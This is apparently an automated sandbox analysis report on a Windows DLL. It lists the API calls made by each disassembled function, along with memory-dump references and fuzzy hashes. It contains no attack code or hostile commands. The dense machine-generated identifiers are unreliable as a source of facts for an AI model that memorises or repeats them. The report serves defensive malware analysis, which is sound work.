                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                    • Opcode ID: bd5a703bd44fd5709a0c54a3551858ea16543827e2e96ccb33409f1b26a7be31
                                                                                                                                                                                                                    • Instruction ID: fde227f4b15013f5b56c8cd68a5dbc819952e4140c2a1797583fbad0ce946d18
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd5a703bd44fd5709a0c54a3551858ea16543827e2e96ccb33409f1b26a7be31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB5180B1A05A098BDB15CF55D48579EB7F1FB49316F20842BC518EB380D3B4A954CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6F23403B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 787680540-0
                                                                                                                                                                                                                    • Opcode ID: efd3d5c772700bf6f0d752fdf9561f0b77d495539a27b2ebebcb31fcc5749222
                                                                                                                                                                                                                    • Instruction ID: 652a99f38ce943e539d014f9ab1c8ebae6b245d6a22eda18f6b499758c678594
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efd3d5c772700bf6f0d752fdf9561f0b77d495539a27b2ebebcb31fcc5749222
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21A4F2A1421A9BDB289A25DC41BAA73F8FF45315F0001BAED01CA580EB76A955CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(6F233D97,00000001,00000000,?,6F229A32,?,6F2343CB,00000000,?,?,?), ref: 6F233CE0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                    • Opcode ID: 2e0e52b107eb914225ca267ef4c683791ba4841da4922e10d8d6e6e3990be101
                                                                                                                                                                                                                    • Instruction ID: 6109edf98d34b207cc1b0df55c2934511313d7fb340c47b1305cbdf1e67685e4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e0e52b107eb914225ca267ef4c683791ba4841da4922e10d8d6e6e3990be101
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74114CB76047095FDB189F79C8915BABBA2FF80759B14482DE5474BA40D371BA42CF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6F233FB5,00000000,00000000,?), ref: 6F234244
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                    • Opcode ID: 3d7a82f76af23d30ea418bcee6c45bbebb690fa8fc0903fd104da497bc9e8b4f
                                                                                                                                                                                                                    • Instruction ID: e1b321119f67307ca8b27fdbb577bab4e790daf3515466db827894252d913005
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d7a82f76af23d30ea418bcee6c45bbebb690fa8fc0903fd104da497bc9e8b4f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EF0D6B3E1422AABDB149A64C805BFA7768FB41755F0104A9DD15B3580EB76FE01CED0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6F229A39,00000000,6F229B59), ref: 6F233BCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 787680540-0
                                                                                                                                                                                                                    • Opcode ID: eac7d38b90873a69bab9c803ff8e8cd61e1ab5521a26854da2ec154624bb2825
                                                                                                                                                                                                                    • Instruction ID: 3b85f947bb42a95f0db59365c5b215dbeeab9434e87cc99c4f4209bebab1b291
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eac7d38b90873a69bab9c803ff8e8cd61e1ab5521a26854da2ec154624bb2825
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F4B3A0521DABD714AA74D845ABA33ECFF45325F0101BAE906D7680EA34AD048B94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(6F233FE7,00000001,00000000,?,6F229A32,?,6F23438F,6F229A32,?,?,?,?,?,6F229A32,?,?), ref: 6F233D56
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                    • Opcode ID: 0778110f1e5fb490a26ae1eca332c8ef3488f15e743a43d76482ebdd6dc8c419
                                                                                                                                                                                                                    • Instruction ID: 87d650dcaaa7ab57ee06a445d85610e2ebe043dc33c520cd9f9e64a3253244c8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0778110f1e5fb490a26ae1eca332c8ef3488f15e743a43d76482ebdd6dc8c419
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F0C8B760471C5FD7145EB98885A6A7BA5FF81728B15442DF6068B940D771AD41CE00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F225AB3: EnterCriticalSection.KERNEL32(-6F24CC75,?,6F224AAC,00000000,6F248B10,0000000C,6F224A67,?,?,?,6F22B022,?,?,6F2287B0,00000001,00000364), ref: 6F225AC2
                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(6F22C0AD,00000001,6F248E90,0000000C,6F22C49C,00000000,00000000), ref: 6F22C0F2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                                                    • Opcode ID: 26a50674a7a0d789c17707bd6324e24e6cf3ac1d4b6c0808a1190afd40755c94
                                                                                                                                                                                                                    • Instruction ID: 1ec900f249bbde780411798e079f50d2cd8dc5605acb2c08f391f88a2e3b9795
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26a50674a7a0d789c17707bd6324e24e6cf3ac1d4b6c0808a1190afd40755c94
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F04F72A107099FDB10EF68D449B8D77E1BB05739F10801AF524DB6D5CBB48954CF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6F229ACC,?,20001004,?,00000002,?), ref: 6F22C647
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                    • Opcode ID: 234bd34f4fb9728eebad25d174026c48e068f73d54c6cf55e8c7efaa2ad5bc15
                                                                                                                                                                                                                    • Instruction ID: a23c673a1e0e77845d475150547aa3041dcd58e610db1cf49e67354f09ea0758
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 234bd34f4fb9728eebad25d174026c48e068f73d54c6cf55e8c7efaa2ad5bc15
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F03A71941A1CABCF12AF25DC04AAE7BA6EF4AB20B004115F80556650CB719A209E95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(6F233B7A,00000001,00000000,?,?,6F2343ED,6F229A32,?,?,?,?,?,6F229A32,?,?,?), ref: 6F233C5A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                    • Opcode ID: dd2bb45587b7001f34a9b5e4143d69b04ec3bc5f06c1bb8eb0590d7cd81053d8
                                                                                                                                                                                                                    • Instruction ID: b1f063840dfe2771943315f79c35371a84a4f05663d4f3b3e790d69ff93b8ba7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd2bb45587b7001f34a9b5e4143d69b04ec3bc5f06c1bb8eb0590d7cd81053d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAF055BB70020957CB049F39C8557AABFA5FFC2720B0A8059EA058F640C632E943CB50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6F208A77
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 6F208AA6
                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 6F208AB4
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208AFB
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(-00000001), ref: 6F208B8E
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6F208BC7
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(-00000001), ref: 6F208BDF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208C1A
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208C33
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F208CB4
                                                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F208CBE
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F208CDB
                                                                                                                                                                                                                    • VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F208CF0
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208CFF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208D88
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208DCC
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208E0E
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208E14
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208E1E
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(75C6D5B0), ref: 6F208E24
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Free$Variant_com_issue_error$AllocByteCharMultiWide$BstrClearCopyInit
                                                                                                                                                                                                                    • String ID: "$<x#o$lines$offsetY
                                                                                                                                                                                                                    • API String ID: 1469084953-2057679158
                                                                                                                                                                                                                    • Opcode ID: 0eeddfdab2741c62b0c30c1dc1bda0066ae21f3347b744bcf57c6f6e6e44ba1b
                                                                                                                                                                                                                    • Instruction ID: aef02ab872bcaa5270b0bc791e6fc56449449d565cc2ec583f70d0409bcd5d78
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0eeddfdab2741c62b0c30c1dc1bda0066ae21f3347b744bcf57c6f6e6e44ba1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26F181B2A0520EDBEB00DFA4C858BEFBBB8AF45719F104159E515EB280DB75E914CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 6F2112A3
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 6F2112AC
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F2112C2
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 6F2112C8
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F2112EA
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 6F2112F6
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 6F211308
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F211321
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F21132F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 6F211338
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FFFFFF), ref: 6F211344
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F211356
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211364
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211379
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F21139B
                                                                                                                                                                                                                      • Part of subcall function 6F210DA0: GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6F2113C9,?,00000000,?), ref: 6F210E2E
                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F2113FD
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211408
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211413
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 6F21141D
                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 6F211424
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 6F211432
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSendText$BeginBitmapColorMetricsModeParent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1460541294-0
                                                                                                                                                                                                                    • Opcode ID: 052fc674b8219e0e74823a8e97704b73c3ceffc481109622ba526d91deef059a
                                                                                                                                                                                                                    • Instruction ID: 719ea93da6ddac0ccc5ad3cc9bf13629a239238e5d217a5d7fa7e0c83264cf85
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 052fc674b8219e0e74823a8e97704b73c3ceffc481109622ba526d91deef059a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3614E72108B01AFDB20DF64C948B5BBBE9FF8A310F00491DF69592594CB71E964CF96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 6F2112A3
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 6F2112AC
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F2112C2
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 6F2112C8
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F2112EA
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 6F2112F6
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 6F211308
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F211321
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F21132F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 6F211338
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FFFFFF), ref: 6F211344
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F211356
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211364
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211379
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F21139B
                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F2113FD
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211408
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211413
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 6F21141D
                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 6F211424
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 6F211432
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2796758630-0
                                                                                                                                                                                                                    • Opcode ID: 963e3a435a2d2760368ab5159490eda97c33aa8cf1a1e686edc393186cfd08f4
                                                                                                                                                                                                                    • Instruction ID: 02b4da9519d0424c24b1de5d74211409131eb798a888e119dcd3d437f5625b22
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 963e3a435a2d2760368ab5159490eda97c33aa8cf1a1e686edc393186cfd08f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD510C72108B41AFDB21DF64C948F6ABBE9FF8A310F00491DF69592560DB31A925CF92
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20628F
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F20629B
                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F2062E4
                                                                                                                                                                                                                    • GetCursor.USER32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206300
                                                                                                                                                                                                                    • CreateMenu.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206344
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20637B
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F206404
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F206387
                                                                                                                                                                                                                      • Part of subcall function 6F205FB0: GetCurrentThreadId.KERNEL32 ref: 6F206023
                                                                                                                                                                                                                    • CreateMenu.USER32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F2063BD
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F2063F4
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetMessageTime.USER32 ref: 6F2060CE
                                                                                                                                                                                                                      • Part of subcall function 6F206090: IsSystemResumeAutomatic.KERNEL32 ref: 6F2060D4
                                                                                                                                                                                                                      • Part of subcall function 6F206090: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F2060F5
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetDesktopWindow.USER32 ref: 6F206101
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetSystemDefaultLangID.KERNEL32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20615B
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetDesktopWindow.USER32 ref: 6F2061B7
